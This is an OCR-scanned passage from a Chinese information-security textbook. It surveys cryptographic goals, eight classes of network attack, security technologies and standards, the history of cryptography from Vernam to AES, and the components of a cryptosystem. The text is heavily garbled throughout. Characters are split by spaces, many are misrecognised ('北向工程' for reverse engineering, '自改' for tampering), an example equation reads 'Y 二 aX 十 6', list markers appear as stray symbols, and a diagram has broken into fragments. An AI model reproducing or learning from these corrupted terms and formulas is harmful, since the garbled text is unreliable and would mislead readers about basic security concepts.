密码 理论 是 信息 安全 的 基础 ,信息 安全 的 机 密 性 、 完 整 性 和 抗 否认 性 都 依赖 密码 算法 。 
通过 加 密 可 以 保护 信息 的 机 密 性 ; 通过 消息 认证 可 以 保证 信息 的 完整 性 ; 通过 数字 签名 可 
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以 保护 信息 的 抗 否 认 性 。 另 外 ,加 /解密 需要 密 钥 参与 ,因此 密 钥 的 管理 和 传递 也 是 非常 重 
要 的 内 容 。 密 码 学 的 主要 研究 内 容 是 加 密 算法 、 消 息 认证 算法 ,数字 签名 算法 及 密 钥 管理 。 

(1) 数据 加 密 算法 。 加 密 是 一 种 数学 变换 ,在 选 定 参数 ( 密 钥 ) 的 参与 下 ,将 信息 从 易于 
理解 的 明文 加 密 为 不 易 理 解 的 密 文 ,同时 也 可 以 将 密 文 解密 为 明文 。 加 密 和 解密 用 的 密 钥 
可 以 相同 ,也 可 以 不 同 。 加 密 和 解密 的 密 钥 相同 的 算法 称 为 对 称 加 密 算法 ,如 DES、AES 
等 ; 加 密 和 解密 的 密 钥 不 相同 的 算法 称 为 非 对称 算 法 ,通常 一 个 密 钥 公开 ( 公 钥 ) , 另 一 个 密 
钥 ( 私 钥 ) 秘 密 保存 ,如 RSA、ECC 等 。 

(2) 消息 认证 算法 。 消 息 认证 是 通过 消息 摘要 来 实现 的 。 消 息 摘要 则 是 通过 消息 摘要 
算法 来 产生 。 消 息 摘要 算法 也 是 一 种 数学 变换 ,通常 是 单 向 变换 , 即 不 可 逆 变 换 , 它 将 不 定 
长 度 的 信息 变换 为 固定 长 度 (如 64 位 ) 的 摘要 ,信息 的 任何 改变 都 会 引起 摘要 的 改变 ,因而 
可 以 通过 消息 摘要 来 检测 信息 是 否 被 自 改 。 

(3) 数字 签名 算法 。 数 字 签名 主要 是 消息 摘要 和 非 对 称 加 密 算法 的 组 合 。 从 原理 上 
讲 , 通 过 私 钥 用 非 对 称 算法 对 信息 本 身 进行 加 密 , 即 可 实现 数字 签名 功能 。 用 私 钥 加 密 后 只 
能 用 对 应 的 公 钥 解密 ,从 而 证 明 此 密 文 确实 是 拥有 加 密 私 钥 的 用 户 签名 的 ,因而 是 不 可 否认 
的 。 实 际 上 ,由 于 非 对 称 算法 的 计算 速度 很 慢 ,所 以 签名 时 一 般 不 直接 对 消息 签名 ,而 是 对 
消息 的 摘要 进行 签名 。 

(4) 密 钥 管理 。 密 钥 算 法 是 公开 的 ,但 密 钥 必须 严格 保护 。 如 果 非 授权 用 户 获得 加 密 
算法 和 密 钥 , 则 很 容易 破解 或 伪造 密 文 ,加密 就 失去 了 意义 。 因 此 , 密 钥 的 产生 发放、 存储 、 
更 换 、 销 毁 等 内 容 ,都 是 密 钥 管 理 要 研究 的 。 

以 上 密码 理论 是 解决 信息 安全 问题 的 基础 之 基础 。 之 所 以 这 么 说 ,是 因为 对 付 各 种 网 
络 攻击 所 用 到 的 安全 理论 与 技术 大 多 都 是 以 这 些 理论 为 基础 的 。 归 纳 一 下 网 络 通信 环境 下 
的 攻击 方式 ,大 多 都 属于 以 下 八 类 。 

O 泄密 : 将 消息 透露 给 未 被 授权 的 任何 人 或 程序 。 

@ 传输 分 析 : 分 析 通 信 双 方 的 通信 模式 。 在 面向 连接 的 应 用 中 ,确定 连接 的 频率 和 持 
续 时 间 ; 在 面向 连接 或 无 连接 的 环境 中 ,确定 双方 的 消息 数量 和 长 度 。 

@ 伪装 : 欺诈 源 向 网 络 中 插入 一 条 消息 。 例 如 攻击 者 产生 一 条 消息 并 声称 这 条 消息 
是 来 自 某 合法 实体 ,或 者 非 消息 接收 方 发 送 的 关于 收 到 或 未 收 到 消息 的 欺诈 应 答 。 

@ 内 容 修 改 : 对 消息 内 容 进 行 插入 .删除 ,转换 或 修改 。 

@ 顺序 修改 : 对 通信 双方 的 消息 顺序 进行 插入 .删除 、 重 新 排序 。 

@ 计时 修改 : 对 消息 的 延 时 和 重 放 。 在 面向 连接 的 应 用 中 ,整个 消息 序列 可 能 是 前 面 
某 合 法 消息 序列 的 重 放 ,也 可 能 是 消息 序列 中 的 一 条 消息 被 延 时 或 重 放 ; 在 面向 无 连接 的 
应 用 中 ,可 能 是 一 条 消息 (如 数据 报 ) 被 延 时 或 重 放 。 

@ 发 送 方 否认 : 发 送 方 否认 发 送 过 某 消息 。 

接收 方 否认 : 接收 方 否认 接收 到 某 消 息 。 

对 付 .@ 两 种 攻击 可 以 利用 密码 编码 理论 ; 对 付 四 一 @ 的 攻击 则 利用 消息 认证 算法 ; 
对 付 〇 .@ 则 应 使 用 数字 签名 算法 。 


2. 安全 理论 
安全 理论 的 内 容 主要 包括 身份 认证 、 授 权 和 访问 控制 ,安全 审计 和 安全 协议 。 
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身份 认证 是 指 验证 用 户 身份 与 所 声称 内 容 是 否 一 致 的 过 程 。 例 如 采用 口令 进行 认证 ， 
还 有 基于 证 书 的 认证 等 。 

授权 和 访问 控制 这 两 个 概念 紧密 相连 ,经 常 蔡 换 使 用 。 授 权 侧 重 强调 用 户 拥有 什么 样 
的 访问 权限 ,通常 为 系统 预定 ; 访问 控制 对 用 户 访问 行为 进行 控制 ,将 用 户 的 访问 行为 控制 
在 授权 允许 的 范围 之 内 。 授 权 类 似 于 签发 通行 证 ,访问 控制 类 似 于 门卫 ,前 者 规定 用 户 是 否 
有 权 出 入 某 个 区 域 ,后 者 检查 用 户 在 出 入 时 是 否 超越 禁区 。 

审计 是 指 对 用 户 的 行为 进行 记录 、 分 析 和 审查 ,以 确认 操作 的 历史 行为 。 

安全 协议 指 构建 安全 平台 时 所 使 用 的 与 安全 防护 有 关 的 协议 ,是 各 种 安全 技术 和 策略 
具体 实现 时 共同 遵循 的 规定 ,例如 网 络 层 安 全 协议 IPSec 传输 层 安 全 协议 SSL 应 用 层 安 
全 电子 商务 协议 SET 等 。 


142 信息 安全 应 用 研究 


1. 安全 技术 


安全 技术 是 对 信息 系统 进行 安全 检查 和 防护 的 技术 ,包括 防火 墙 技术 、 漏 洞 扫描 和 分 
析 、 入 侵 检 测 、 防 病毒 等 。 

防火 墙 技 术 是 一 种 安全 隔离 技术 ,通过 在 两 个 安全 策略 上 不 同 域 之 间 设 置 防火 墙 来 控 
制 两 个 域 之 间 的 互 访 行为 。 

漏洞 扫描 和 分 析 是 针对 特定 信息 网 络 中 存在 的 漏洞 而 进行 的 。 信 息 网 络 中 无 论 是 主机 
还 是 网 络 设备 都 存在 安全 隐患 ,有 些 是 因 系 统 设计 考虑 不 周 留 下 的 ,有 些 是 系统 建设 时 出 现 
的 。 这 些 漏洞 很 容易 被 攻击 ,从 而 危害 网 络 安全 。 由 于 安全 漏洞 大 多 是 隐蔽 的 ,因此 必须 定 
期 扫描 检查 修复 加 固 。 操 作 系 统 的 补丁 就 是 为 弥补 已 经 发 现 的 漏洞 而 开发 的 。 由 于 漏洞 
扫描 技术 很 难 自动 分 析 系 统 的 设计 和 实现 ,因此 很 难 发 现 未 知 的 漏洞 。 对 于 那些 未 知 的 漏 
洞 , 往 往 是 通过 专门 的 漏洞 分 析 技 术 来 完成 ,例如 北向 工程 。 

入 侵 检测 是 通过 从 计算 机 网 络 系统 中 的 若干 关键 结 点 收集 信息 ,并 分 析 这 些 信息 ,监控 
网 络 中 是 否 有 违反 安全 策略 的 行为 或 者 是 否 存 在 入 侵 行 为 ,是 对 指向 计算 和 网 络 资源 的 恶 
意 行为 的 识别 和 响应 过 程 。 

病毒 是 一 种 具有 传染 性 和 破坏 性 的 计算 机 程序 。 随 着 网 络 的 普及 ,计算 机 病毒 的 传播 
速度 大 大 加 快 ,破坏 力也 在 增强 ,因此 研究 和 防范 计算 机 病毒 也 是 信息 安全 的 一 个 重要 方 
面 。 病 毒 的 防范 研究 重点 包括 病毒 的 作用 机 理 、 病 毒 的 特征 、 传 播 模式 .扫描 和 清除 等 。 


平台 安全 包括 物理 安全 、 网 络 安全 、 系 统 安全 ,数据 安全 、 用 户 安全 和 边界 安全 。 

物理 安全 是 指 保障 信息 网 络 物理 设备 不 受 物理 损害 ,或 是 损坏 时 能 及 时 修复 或 替换 。 
通常 是 针对 设备 的 自然 损害 、 人 为 破坏 或 灾害 损害 而 提出 的 。 目 前 常见 的 物理 安全 技术 有 
备份 技术 安全 加 固 技术 安全 设计 技术 等 。 

网 络 安全 的 目标 是 防止 针对 网 络 平台 的 实现 和 访问 模式 的 安全 威胁 。 主 要 内 容 包 括 安 
全 隧道 技术 、 网 络 协议 脆弱 性 分 析 技术 安全 路 由 技术 安全 卫 协议 等 。 


第 1 章 ”信息 安全 概述 


i 
了 中 


系统 安全 是 各 种 应 用 程序 的 基础 。 系 统 安全 关心 的 主要 问题 是 操作 系统 自身 的 安全 性 
问题 。 主 要 研究 内 容 包括 安全 操作 系统 的 模型 和 实现 ,操作 系统 的 安全 加 固 、 脆 弱 性 分 析 、 
操作 系统 和 其 他 开发 平台 的 安全 关系 等 。 

数据 是 信息 的 直接 表现 形式 ,数据 安全 主要 关心 数据 在 存储 和 应 用 过 程 中 是 否 会 被 非 
授权 用 户 有 意 破 坏 或 者 被 授权 用 户 无 意 破 坏 。 数 据 通常 以 数据 库 或 文件 形式 存储 ,因此 数 
据 安全 主要 表现 为 数据 库 或 数据 文件 的 安全 问题 。 数 据 库 系 统 或 数据 文件 系统 采用 什么 样 
的 认证 、 授 权 、 访 问 控制 及 审计 等 安全 机 制 , 达 到 什么 安全 等 级 ,机 密 数据 能 否 被 加 密 存 储 
等 。 数 据 安 全 研究 的 主要 内 容 有 安全 数据 库 系统 .数据 存 取 安 全 策略 和 实现 方式 等 。 

用 户 安全 问题 有 两 层 含义 : 一 方面 ,合法 用 户 的 权限 是 否 被 正确 授权 ,是 否 有 越权 访 
问 ,是 否 只 有 授权 用 户 才 能 使 用 系统 资源 。 另 一 方面 ,被 授权 的 用 户 是 否 获得 了 必要 的 访问 
权限 ,是否 存 在 多 业务 系统 的 授权 矛盾 等 。 用 户 安全 研究 的 主要 内 容 包括 账户 的 管理 ,用户 
登录 模式 .用户 权限 管理 .用户 的 角色 管理 等 。 

边界 安全 关心 的 是 不 同安 全 策略 的 区 域 边界 连接 的 安全 问题 。 不 同 的 安全 域 具 有 不 同 
的 安全 策略 ,将 它们 互 连 时 应 该 采用 什么 样 的 安全 策略 才 不 会 破坏 原来 的 安全 策略 ,应 该 采 
用 什么 样 的 隔离 和 控制 措施 来 限制 互 访 , 各 种 安全 机 制 和 措施 互 连 后 满足 什么 样 的 安全 关 
系 , 这 些 问 题 都 需要 解决 。 边 界 安全 的 主要 研究 内 容 是 安全 边界 防护 协议 和 模型 ,不 同安 全 
策略 的 连接 关系 问题 .信息 从 高 安全 域 流 向 低 安全 域 的 保密 问题 ,安全 边界 的 审计 问题 等 。 


14.3 信息 安全 管理 研究 


1. 安全 策略 研究 


安全 策略 是 安全 系统 设计 实施 、 管 理 和 评估 的 依据 。 针 对 具体 的 信息 和 网 络 的 安全 ， 
应 保护 哪些 资源 ,花费 多 大 代价 ,采取 什么 措施 ,达到 什么 样 的 安全 强度 ,都 是 由 安全 策略 决 
定 的 ,不 同 国家 和 单位 针对 不 同 的 应 用 都 应 制定 相应 的 安全 策略 。 例 如 ,什么 级 别 的 信息 应 
该 采用 什么 保护 强度 ,针对 不 同 级 别 的 风险 能 承受 什么 样 的 代价 ,对 于 这 些 问 题 都 应 该 制定 
策略 。 

安全 策略 的 研究 内 容 包 括 安全 风险 评估 安全 代价 评估 安全 机 制 的 制定 以 及 安全 措施 
的 实施 和 管理 等 。 


2. 安全 标准 研究 


安全 标准 研究 是 推进 安全 技术 和 产品 标准 化 、 规 范 化 的 基础 。 各 国都 非常 重视 安全 标 
准 的 研究 和 制定 。 主 要 的 标准 化 组 织 都 推出 了 安全 标准 ,著名 的 安全 标准 有 可 信 计 算 机 系 
统 评估 准则 (TCSEC) .通用 准则 (CC) .安全 管理 标准 ISO17799 等 。 

安全 标准 给 出 了 技术 发 展 . 产 品 研 制 、 安 全 测评 方案 设计 等 多 方面 的 技术 依据 。 如 
TCSEC 将 安全 划分 为 七 个 等 级 ,并 从 技术 文档 .保障 等 方面 规定 了 各 个 安全 等 级 的 要 求 。 

安全 标准 研究 的 主要 内 容 包括 安全 等 级 划分 、 安 全 技术 操作 标准 安全 体系 结构 标准 、 
安全 产品 测评 标准 和 安全 工程 实施 标准 等 。 
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3. 安全 测评 研究 


安全 测评 是 依据 安全 标准 对 安全 产品 或 信息 系统 进行 安全 性 评定 。 目 前 开展 的 测评 有 
技术 测评 机 构 开 展 的 技术 测评 ,也 有 安全 主管 部 门 开展 的 市 场 准 入 测评 。 测 评 包 括 功能 测 
评 、 性 能 测评 ` 安 全 性 测评 ` 安 全 等 级 测评 等 。 

安全 测评 研究 的 主要 内 容 有 测评 模型 测评 方法 ,测评 工具 ,测评 规程 等 。 


密码 学 基础 


密码 学 是 关于 加 密 和 解密 变换 的 一 门 科学 ,是 保护 数据 和 信息 的 有 力 武器 。 
密码 学 作为 信息 安全 理论 与 技术 的 基石 ,在 信息 安全 领域 发 挥 着 中 流 碟 柱 的 作用 。 密 
码 学 理论 的 应 用 ,成 为 现代 信息 网 络 得 以 生存 和 不 断 发 展 的 基本 前 提 。 


2.1 密码 学 的 发 展 历史 


密码 通信 的 历史 极为 久远 ,其 起 源 可 以 追溯 到 几 千年 前 的 埃及 .巴比伦 . 古 罗 马 和 十 希 
腊 , 古 典 密码 术 虽 然 不 是 起 源 于 战争 ,但 其 发 展 成 果 却 首先 被 用 于 战争 。 交 战 双方 都 为 了 保 
护 自 己 的 通信 安全 ,以 及 窃取 对 方 情报 而 研究 各 种 方法 。 

密码 学 的 英文 单词 cryptography 来 源 于 词根 crypto( 隐 藏 或 秘密 ) 以 及 graphy( 写 )。 
一 般 来 讲 ,人 们 通常 认为 密码 学 是 一 种 将 信息 表述 为 不 可 读 内 容 的 方式 (加 密 ) ,并 且 可 以 采 
用 一 种 秘密 方法 将 信息 恢复 出 来 (解密 )。 密 码 学 提供 的 最 基础 的 服务 就 是 使 通信 者 能 够 互 
相 发 送信 息 同时 避免 其 他 人 员 读 取信 息 内 容 。 随 着 密码 学 的 发 展 , 它 还 提供 了 身份 认证 \ 完 
整 性 校 验 .数字 签名 等 安全 服务 。 

1834 年 ,伦敦 大 学 的 实验 物理 学 教授 惠 斯 顿 发 明了 电机 ,这 是 通信 向 机 械 化 .电气 化 跃 
进 的 开始 ,也 为 密码 通信 采用 在 线 加 密 技 术 提供 了 前 提 条 件 。 

密码 技术 的 成 果 首先 被 用 于 战争 。1914 年 第 一 次 世界 大 战 爆发 , 德 俄 相 互 宣战 。 在 交 
战 过 程 中 ,德军 破译 了 俄 军 第 一 军 给 第 二 军 的 电文 ,从 中 得 知 第 一 军 的 给 养 已 经 中 断 。 根 据 
这 一 重要 情报 ,德军 在 这 次 战役 中 取得 了 全 胜 。 这 说 明 当 时 交战 双方 已 开展 了 密码 战 ,战争 
刺激 了 密码 学 的 发 展 。 

1920 年 ,美国 电报 电话 公司 的 弗 纳 姆 发 明了 弗 纳 姆 密码 。 其 原理 是 利用 电 传 打字 机 的 
五 单位 码 与 密 钥 字母 进行 模 2 相 加 。 如 信息 码 ( 明 文 ) 为 11010, 密 钥 码 为 11101, 则 模 2 相 
加 得 00111 即 为 密 文 码 。 接 收 时 ,将 密 文 码 再 与 密 钥 码 模 2 相 加 得 信息 码 ( 明 文 )11010。 这 
种 密码 结构 在 今天 看 起 来 非常 简单 ,但 由 于 这 种 密码 体制 第 一 次 使 加 密 由 原来 的 手工 操作 
变 为 由 电子 电路 来 实现 ,而 且 加 密 和 解密 可 以 直接 由 机 器 来 实现 ,因而 在 近代 密码 学 发 展 史 
上 占有 重要 地 位 。 

1946 年 电子 计算 机 一 出 现 便 用 于 密码 破译 ,使 密码 进入 电子 时 代 。 

以 上 这 些 密码 的 研究 还 称 不 上 是 一 门 科 学 。 直 到 1949 年 香农 发 表 了 一 篇 题 为 (保密 系 
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统 的 通信 理论 ?的 著名 论文 ,该 文 首先 将 信息 论 引 入 了 密码 ,从 而 把 已 有 数 千 年 历史 的 密码 
学 推 向 了 科学 的 轨道 ,奠定 了 密码 学 的 理论 基础 。 该 文 利 用 数学 方法 对 信息 源 、 密 钥 源 、 接 
收 和 截获 的 密 文 进行 了 数学 描述 和 定量 分 析 , 提 出 了 通用 的 秘密 钥 密 码 体制 模型 。 将 密码 
置 于 坚实 的 数学 基础 之 上 ,标志 着 密码 学 作为 一 门 学 科 的 形成 。 

由 于 受 历史 的 局 限 ,20 世纪 70 年 代 中 期 以 前 的 密码 学 研究 基本 上 是 秘密 地 进行 ,而 且 
主要 应 用 于 军事 和 政府 部 门 。 密 码 学 的 真正 蓬勃 发 展 和 广泛 的 应 用 是 从 20 世纪 70 年 代 中 
期 开始 的 。 

在 密码 学 发 展 进程 中 的 另 一 件 值得 注意 的 事件 是 ,在 1976 年 ,美国 密码 学 家 W. Diffie 
和 M. Hellman 在 《密码 学 的 新 方向 ) 一 文中 提出 了 一 个 轩 新 的 思想 ,不 仅 加 密 算法 本 身 可 
以 公开 ,甚至 加 密 用 的 密 钥 也 可 以 公开 。 但 这 并 不 意味 着 保密 程度 的 降低 。 因 为 如 果 加 密 
密 钥 和 解密 密 钥 不 一 样 , 只 需 将 解密 密 钥 保密 就 可 以 。 这 就 是 著名 的 公 钥 密码 体制 。 若 存 
在 这 样 的 公 钥 体制 ,就 可 以 将 加 密 密 钥 像 电话 短 一 样 公开 ,任何 用 户 想 给 其 他 用 户 传送 加 密 
信息 时 ,就 可 以 从 这 本 密 钥 簿 中 查 到 该 用 户 的 公开 密 钥 ,用 它 来 加 密 , 而 接收 者 用 只 有 他 具 
有 的 解密 密 钥 得 到 明文 。 任 何 第 三 者 不 能 获得 明文 。 

1978 年 ,由 美国 麻 省 理工 学 院 三 位 年 轻 的 数学 家 R. L. Rivest、 A. Shamir 和 工 . 
Adleman 提出 了 RSA 公 钥 密码 体制 ,并 以 三 人 名 字 的 首 字母 命名 , 它 是 第 一 个 成 熟 的 、 迄 
今 为止 理 论 上 最 成 功 的 公 钥 密码 体制 。 它 的 安全 性 是 基于 数论 中 的 大 整数 因子 分 解 。 该 问 
题 是 数论 中 的 一 个 困难 问题 ,至今 没有 有 效 的 解决 算法 ,这 使 得 该 体制 具有 较 高 的 保密 性 。 

1977 年 美国 国家 标准 局 颁布 了 数据 加 密 标准 DES, 用 于 非 国家 保密 机 关 。 该 系统 完全 
公开 了 加 密 、 解 密 算 法 。 此 举 突破 了 早期 密码 学 的 信息 保密 的 单一 目的 ,使 得 密码 学 得 以 在 
商业 等 民用 领域 广泛 应 用 ,从 而 给 这 门 学 科 以 巨大 的 生命 力 。DES 是 历史 上 非常 著名 的 一 
个 对 称 加 密 算法 , 它 的 设计 充分 体现 了 香农 信息 保密 理论 所 曾 述 的 设计 密码 的 思想 ,标志 
密码 设计 与 分 析 达 到 了 新 的 水 平 。 在 颁布 之 后 使 用 了 近 20 年 ,是 密码 史上 的 一 个 创举 。 
1998 年 底 , 美 国政 府 宣布 不 再 支持 DES,DES 完成 了 其 历史 使 命 。 但 是 由 于 DES 已 经 制 成 
各 种 计算 机 软件 和 硬件 的 产品 并 且 广泛 应 用 ,因此 DES 的 使 用 不 可 能 立刻 停止 。 

早 在 1984 年 ,美国 总 统 就 下 令 美国 保密 局 研制 一 种 新 密码 ,准备 取代 DES。 经 过 10 年 
的 研制 和 试用 , 1994 年 美国 颁布 了 密码 托管 加 密 标准 EES (Escrowed Encryption 
Standard) ,这 是 密码 史上 又 一 个 创举 。EES 的 密码 算法 被 设计 成 允许 法 律 监听 的 保密 方 
式 。 如 此 设计 的 目的 在 于 既 要 保护 正常 的 商业 通信 秘密 ,又 要 在 法 律 部 门 允 许 的 情况 下 进 
行 监听 ,以 阻止 不 法 分 子 利用 保密 通信 进行 犯罪 活动 。 而 且 EES 只 提供 芯片 ,不 公开 算法 。 
1995 年 美国 贝尔 实验 室 的 M. Blaze 博士 攻击 EES 的 法 律 监督 字段 ,伪造 ID 获得 成 功 。 于 
是 美国 政府 宣布 EES 只 用 于 语音 加 密 , 不 用 于 计算 机 数据 加 密 , 并 且 后 来 又 公开 了 算法 。 

1994 年 美国 颁布 了 数字 签名 标准 DSS(Digital Signature Standard) 。 数 字 签 名 就 是 数 
字形 式 的 签名 盖 章 ,是 确保 数据 真实 性 的 一 种 重要 措施 。 没 有 数字 签名 ,诸如 电子 政务 、 电 
子 金融 .电子 商务 等 系统 是 不 能 实际 使 用 的 。 由 于 美国 在 科学 技术 方面 的 领先 地 位 ,DSS 
实际 上 已 经 成 为 一 种 国际 标准 。 许 多 国家 的 标准 化 组 织 都 将 DSS 颁布 为 数字 签名 标准 。 

1997 年 美国 宣布 公开 征集 高 级 加 密 标 准 AES(Advanced Encryption Standard) ,以 取 
代 1998 年 底 停止 使 用 的 DES。 经 过 三 轮 筛 选 ,最 终 在 2001 年 10 月 2 日 ,正式 宣布 选中 比 
利 时 密码 学 家 Joan Daemen 和 Vincent Rijmen 提出 的 名 为 Rijndael 的 算法 作为 AES 算法 。 
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2001 年 11 月 26 日 ,正式 颁布 AES 为 美国 国家 标准 。2002 年 许多 国际 化 标准 组 织 都 采纳 
AES 作为 其 标准 。 为 了 和 国际 接轨 ,我 国 也 在 某 些 商业 领域 采用 AES。 

随 着 密码 学 在 各 行 各 业 的 应 用 越 来 越 广泛 ,也 随 之 产生 一 些 需要 解决 的 问题 。 比 如 ,在 
密码 传输 过 程 ,由 于 所 要 处 理 的 数据 量 特别 大 ,往往 会 出 现 一 些 误差 ,这 当然 会 给 用 户 带 来 
一 定 的 麻烦 和 损失 。 正 是 社会 的 这 一 巨大 需求 促进 了 纠 错 码 理论 及 其 工程 应 用 的 迅速 发 
展 ,各 种 纠 错 编码 以 其 自动 纠正 或 检测 出 数据 传输 中 的 误差 这 一 特点 , 深 受 各 界 的 青睐 。 各 
种 功能 完备 的 纠 错 编码 已 在 实际 工程 中 得 到 广泛 的 应 用 。 
按照 人 们 对 密码 的 一 般 理 解 , 密 码 是 用 于 将 信息 加 密 而 不 易 破 译 ,但 在 现代 密码 学 中 ， 
除了 信息 保密 外 ,还 有 另 一 方面 的 要 求 , 即 信息 安全 体制 还 要 能 抵抗 对 手 的 主动 攻击 。 所 谓 
主动 攻击 指 的 是 攻击 者 可 以 在 信息 通道 中 注入 他 自己 伪造 的 消息 ,以 骗取 合法 接收 者 的 相 
和信。 主动 攻击 还 可 能 自 改 信息 ,也 可 能 冒名 项 蔡 , 这 就 产生 了 现代 密码 学 中 的 认证 体制 。 该 
体制 的 目的 就 是 保证 用 户 收 到 一 个 信息 时 ,能 验证 消息 是 否 来 自 合法 的 发 送 者 ,同时 还 能 验 
证 该 信息 是 否 被 筑 改 过 。 

进入 21 世纪 ,各 种 新 领域 的 密码 学 研究 也 广泛 开展 。 随 着 量子 计算 机 研究 热潮 的 兴 
起 ,世界 各 国 对 量子 密码 的 研究 也 广泛 开展 。 量 子 密码 具有 可 证 明 的 安全 性 ,同时 还 能 对 窃 
听 行 为 方便 地 进行 检测 。 这 些 特性 使 得 量子 密码 具有 其 他 密码 所 没有 的 优势 ,因而 量子 密 
码 引 起 了 国际 密码 学 界 的 高 度 重 视 。 另 外 ,混沌 是 一 种 复杂 的 非 线性 非 平衡 动力 学 过 程 。 
由 于 混沌 序列 是 一 种 具有 良好 随机 人 性 的 非 线性 序列 ,有 可 能 构成 新 的 序列 密码 ,因此 世界 各 
国 的 密码 学 者 对 混沌 密码 寄予 了 很 大 的 期 望 。 还 有 生物 信息 技术 的 发 展 也 推动 着 生物 芯 
片 、 生 物 计算 机 和 基于 生物 信息 特征 的 生物 密码 的 研究 。 量 子 密码 ,混沌 密码 、 生 物 密码 的 
出 现 将 把 我 们 带 入 一 个 新 的 密码 学 世界 。 

自古 以 来 ,密码 主要 用 于 军事 、 政 治 、 外 交 等 要 害 部 门 ,因此 密码 学 的 研究 工作 本 身 也 是 
秘密 进行 的 。 密 码 学 的 知识 和 经 验 也 主要 掌握 在 军事 政治、 外 交 等 保密 机 关 , 不 便 公开 发 
表 。 这 是 过 去 密码 学 的 书籍 资料 很 少 的 原因 。 

然而 由 于 计算 机 科学 技术 、 通 信 技 术 、 微 电子 技术 的 发 展 ,使 得 计算 机 和 通信 网 络 的 应 
用 进入 了 人 们 的 日 常生 活 和 活动 中 ,出 现 了 电子 商务 、 电 子 政务 、 电 子 金 融 等 必须 确保 信息 
安全 的 系统 ,使 民间 和 商业 界 对 信息 安全 保密 的 需求 大 大 增加 。 于 是 ,在 民间 产生 了 一 批 不 
从 属于 保密 机 关 的 密码 学 者 。 他 们 可 以 在 公开 刊物 上 发 表 文章 ,讨论 学 术 , 公 开 地 进行 密码 
研究 工作 。 密 码 学 的 研究 由 过 去 的 单纯 以 秘密 方式 进行 ,转向 公开 和 秘密 两 条 战线 同时 进 
行 。 实 践 证 明 , 正 是 这 种 公开 研究 和 秘密 研究 相 结合 的 局 面 促 成 了 今天 密码 学 的 空前 繁荣 。 


22 密码 学 的 基本 概念 


1. 密码 体制 基本 组 成 


密码 技术 的 基本 思想 是 伪装 信息 。 伪装 就 是 对 数据 施加 一 种 可 逆 的 数学 变换 ,伪装 前 
的 数据 称 为 明文 ,伪装 后 的 数据 称 为 密 文 ,伪装 的 过 程 称 为 加 密 ,去 掉 伪装 恢复 明文 的 过 程 
称 为 解密 。 加 密 和 解密 的 过 程 要 在 密 钥 的 控制 下 进行 。 

研究 各 种 加 密 方案 的 学 科 称 为 密码 编码 学 ,加 密 方案 则 被 称 为 密码 体制 或 者 密码 。 研 
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究 破 译 密码 的 学 科 称 为 密码 分 析 学 。 密 码 分 析 学 和 密码 编码 学 统称 密码 学 。 
一 个 密码 系统 ,通常 简称 为 密码 体制 ,由 五 部 分 组 成 。 
(1) 明文 空间 UM) : 全 体 明文 的 集合 。 
(2) 密 文 空间 (C) : 全 体 密 文 的 集合 。 
(3) 加 密 算法 (E): 一 组 由 M 到 C 的 加 密 变换 。 
(4) 解密 算法 (D): 一 组 由 C 到 WM 的 解密 变换 。 
(5) 密 钥 空间 (K) : 全 体 密 钥 的 集合 ,其 中 ,加 密 密 钥 用 K. 表示 ,解密 密 钥 用 Ku 表示 。 
加 密 就 是 明文 在 密 钥 和 加 密 算法 的 共同 作用 下 生成 密 文 的 过 程 : C=E(M,K.)。 
信息 加 密 传输 的 过 程 如 图 2-1 所 示 。 


攻击 者 


加 1 1 解 
明 | | 密 |_C。! 信 | C M ,| 明 
学 算 1 道 1 划 
法 | 法 
df 密 负 K 
加 密 密 钥 |- - 择 解密 密 钥 
a 


图 2-1 信息 加 密 传输 


需要 特别 注意 的 是 ,数据 安全 基于 密 钥 而 不 是 算法 的 保密 。 也 就 是 说 ,对 于 一 个 密码 体 
制 ,其 算法 是 可 以 公开 的 ,让 所 有 人 来 使 用 研究。 但 具体 对 于 某 次 加 密 过 程 中 所 使 用 的 密 
钥 , 则 是 保密 的 。 初 学 者 对 于 密 钥 的 概念 可 能 比较 模糊 。 如 果 把 加 密 和 解密 算法 看 做 一 个 
函数 , 则 密 钥 就 类 似 于 函数 中 参数 的 具体 取 值 。 函 数 的 类 型 .计算 方式 可 以 公开 ,但 具体 加 
密 时 所 使 用 的 参数 则 是 保密 的 。 

例如 ,加 密 算法 为 Y 二 aX 十 6, 其 中 ,X 为 明文 ,计算 后 Y 成 为 密 文 。 在 具体 加 密 过 程 
中 ,a,6 的 取 值 为 密 钥 ,假设 为 (2,3), 明 文 为 2, 则 密 文 计算 后 为 7。 在 这 个 过 程 中 ,Y 二 
aX 十 6b 可 以 公开 ,但 具体 4 二 2,b6 二 3 的 取 值 不 公开 。 所 以 即使 对 方 知道 了 采用 的 加 密 算法 ， 
由 于 不 知道 具体 参数 取 值 ,也 无 法 根据 密 文 计算 出 明文 。 


2. 算法 设计 的 公开 原则 


密码 的 设计 应 当 遵循 公开 设计 原则 , 千 万 不 要 把 密码 的 安全 建立 在 对 手 的 无 知之 上 。 
只 有 在 假设 对 手 对 密码 算法 有 充分 的 研究 并 且 拥有 足够 的 计算 资源 的 情况 下 仍然 安全 的 密 
码 才 是 真正 安全 的 。 

算法 公开 就 要 求 算法 设计 的 完备 .没有 缺陷 ,否则 分 析 者 可 以 通过 研究 算法 的 弱点 来 分 
析出 密 钥 ,甚至 解 出 明文 。 例 如 刚才 举 的 例子 ,Y 一 aX 十 和, 就 属于 一 个 设计 有 缺陷 的 算法 ， 
分 析 者 只 要 得 到 两 组 明文 和 其 所 对 应 的 密 文 ,就 很 容易 计算 出 密 钥 a、b 的 取 值 , 从 而 分 析出 
所 有 的 密 文 。 

例如 美国 在 20 世纪 70 年 代 制 定 的 DES 采用 公开 征集 .公开 评价 的 原则 ,实践 证 明 
DES 是 安全 的 。20 世纪 80 年 代 制 定 的 EES, 采 用 内 部 设计 ,只 提供 芯片 不 公开 算法 的 原 
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则 ,结果 发 现 有 安全 缺陷 。 

20 世纪 90 年 代 制 定 的 AES, 又 采用 在 全 世界 范围 的 公开 征集 .公开 评价 的 原则 ,因此 
可 以 预计 AES 是 安全 的 。 美 国 在 商业 密码 政策 上 走 过 的 从 公开 到 封闭 再 到 公开 的 技术 路 
线 , 从 实践 角度 证 明了 密码 的 公开 设计 原则 的 正确 性 。 

密码 设计 的 公开 原则 并 不 等 于 所 有 的 密码 在 应 用 时 都 要 公开 加 密 算法 。 世 界 各 国 的 军 
政 核心 密码 都 不 公开 其 加 密 算 法 。 世 界 各 主要 国家 都 有 强大 的 专业 密码 设计 与 分 析 队 伍 ， 
他 们 仍然 坚持 密码 的 公开 设计 原则 ,在 内 部 进行 充分 的 分 析 , 只 是 对 外 不 公开 而 已 。 在 公开 
